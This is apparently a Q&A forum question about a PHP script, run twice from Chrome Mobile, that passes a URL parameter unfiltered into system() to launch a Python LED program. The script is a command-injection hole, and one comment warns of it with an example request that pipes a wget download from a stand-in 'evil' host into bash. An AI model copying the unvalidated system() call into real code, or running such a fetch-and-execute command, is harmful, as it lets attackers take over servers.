# PHP loaded twice from Chrome when passing a specific value via URL

Tags: php, mobile-chrome

I'm having a weird issue with a simple php script which execute a python program passing it one parameter. 
Here below is the *script.php*:

```
<?php
$t = $_GET['t'];
system("python /var/www/html/ledcontrol.py " . $t);
?>
```

When loading this script from Chrome Mobile with t=5 (*/file.php?t=5*) the python program is always executed two times in a row: in the Apache access log I find two accesses with different IPs. Instead, if I set *t* to a different value, or use different browsers, the script runs perfectly.
How can the value of t=5 affect the behavior of this simple script?
How can I fix it?

Thank you very much!

Comment: Does https://stackoverflow.com/questions/4761913/server-socket-receives-2-http-requests-when-i-send-from-chrome-and-receives-one help?

Comment: May be you have some addons in your chrome ? 
Its not a PHP problem but a client side. You can debug your chrome mobile on our phone from PC Chrome console. Try to look on client network activity in chrome when you requesting php script

Comment: Notice you are throwing a user defined value directly into a `system()` call unfiltered. An ill-intentioned user can easily take control of your server by sending requests such as `file.php?t=5 | wget -O - http://evil/script.sh | bash` You should validate all and any user input before using it.